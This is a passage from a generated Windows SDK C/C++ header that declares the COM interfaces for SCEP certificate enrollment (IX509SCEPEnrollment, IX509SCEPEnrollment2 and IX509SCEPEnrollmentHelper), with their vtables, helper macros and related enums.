            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ServerCapabilities )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FailInfo )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *DeleteRequest )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        END_INTERFACE
    } IX509SCEPEnrollmentVtbl;

    interface IX509SCEPEnrollment
    {
        CONST_VTBL struct IX509SCEPEnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SCEPEnrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollment_Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding) ) 

#define IX509SCEPEnrollment_InitializeForPending(This,Context)	\
    ( (This)->lpVtbl -> InitializeForPending(This,Context) ) 

#define IX509SCEPEnrollment_CreateRequestMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequestMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_CreateRetrievePendingMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrievePendingMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue) ) 

#define IX509SCEPEnrollment_ProcessResponseMessage(This,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage(This,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment_put_ServerCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_ServerCapabilities(This,Value) ) 

#define IX509SCEPEnrollment_get_FailInfo(This,pValue)	\
    ( (This)->lpVtbl -> get_FailInfo(This,pValue) ) 

#define IX509SCEPEnrollment_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509SCEPEnrollment_get_OldCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment_put_OldCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_OldCertificate(This,pValue) ) 

#define IX509SCEPEnrollment_get_TransactionId(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_put_TransactionId(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Encoding,Value) ) 

#define IX509SCEPEnrollment_get_Request(This,ppValue)	\
    ( (This)->lpVtbl -> get_Request(This,ppValue) ) 

#define IX509SCEPEnrollment_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509SCEPEnrollment_put_CertificateFriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,Value) ) 

#define IX509SCEPEnrollment_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509SCEPEnrollment_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509SCEPEnrollment_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509SCEPEnrollment_DeleteRequest(This)	\
    ( (This)->lpVtbl -> DeleteRequest(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollment_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0097 */
/* [local] */ 

typedef 
enum X509SCEPProcessMessageFlags
    {
        SCEPProcessDefault	= 0,
        SCEPProcessSkipCertInstall	= 0x1
    } 	X509SCEPProcessMessageFlags;

typedef 
enum DelayRetryAction
    {
        DelayRetryUnknown	= 0,
        DelayRetryNone	= 1,
        DelayRetryShort	= 2,
        DelayRetryLong	= 3,
        DelayRetrySuccess	= 4,
        DelayRetryPastSuccess	= 5
    } 	DelayRetryAction;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0097_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0097_v0_0_s_ifspec;

#ifndef __IX509SCEPEnrollment2_INTERFACE_DEFINED__
#define __IX509SCEPEnrollment2_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollment2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollment2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab364-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollment2 : public IX509SCEPEnrollment
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE CreateChallengeAnswerMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ProcessResponseMessage2( 
            /* [in] */ X509SCEPProcessMessageFlags Flags,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ResultMessageText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DelayRetry( 
            /* [retval][out] */ __RPC__out DelayRetryAction *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ActivityId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ActivityId( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollment2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollment2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRequestMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrievePendingMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrieveCertificateMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ServerCapabilities )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FailInfo )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *DeleteRequest )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *CreateChallengeAnswerMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage2 )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509SCEPProcessMessageFlags Flags,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ResultMessageText )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DelayRetry )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out DelayRetryAction *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ActivityId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ActivityId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } IX509SCEPEnrollment2Vtbl;

    interface IX509SCEPEnrollment2
    {
        CONST_VTBL struct IX509SCEPEnrollment2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollment2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollment2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollment2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollment2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollment2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollment2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SCEPEnrollment2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollment2_Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding) ) 

#define IX509SCEPEnrollment2_InitializeForPending(This,Context)	\
    ( (This)->lpVtbl -> InitializeForPending(This,Context) ) 

#define IX509SCEPEnrollment2_CreateRequestMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequestMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_CreateRetrievePendingMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrievePendingMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_ProcessResponseMessage(This,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage(This,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment2_put_ServerCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_ServerCapabilities(This,Value) ) 

#define IX509SCEPEnrollment2_get_FailInfo(This,pValue)	\
    ( (This)->lpVtbl -> get_FailInfo(This,pValue) ) 

#define IX509SCEPEnrollment2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509SCEPEnrollment2_get_OldCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment2_put_OldCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_OldCertificate(This,pValue) ) 

#define IX509SCEPEnrollment2_get_TransactionId(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_put_TransactionId(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Encoding,Value) ) 

#define IX509SCEPEnrollment2_get_Request(This,ppValue)	\
    ( (This)->lpVtbl -> get_Request(This,ppValue) ) 

#define IX509SCEPEnrollment2_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509SCEPEnrollment2_put_CertificateFriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,Value) ) 

#define IX509SCEPEnrollment2_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509SCEPEnrollment2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509SCEPEnrollment2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509SCEPEnrollment2_DeleteRequest(This)	\
    ( (This)->lpVtbl -> DeleteRequest(This) ) 


#define IX509SCEPEnrollment2_CreateChallengeAnswerMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateChallengeAnswerMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_ProcessResponseMessage2(This,Flags,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage2(This,Flags,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment2_get_ResultMessageText(This,pValue)	\
    ( (This)->lpVtbl -> get_ResultMessageText(This,pValue) ) 

#define IX509SCEPEnrollment2_get_DelayRetry(This,pValue)	\
    ( (This)->lpVtbl -> get_DelayRetry(This,pValue) ) 

#define IX509SCEPEnrollment2_get_ActivityId(This,pValue)	\
    ( (This)->lpVtbl -> get_ActivityId(This,pValue) ) 

#define IX509SCEPEnrollment2_put_ActivityId(This,Value)	\
    ( (This)->lpVtbl -> put_ActivityId(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollment2_INTERFACE_DEFINED__ */


#ifndef __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__
#define __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollmentHelper */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollmentHelper;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab365-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollmentHelper : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strCACertificateThumbprint) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeForPending( 
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTransactionId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Enroll( 
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE FetchPending( 
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509SCEPEnrollment( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SCEPEnrollment **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ResultMessageText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollmentHelperVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollmentHelper * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollmentHelper * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollmentHelper * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
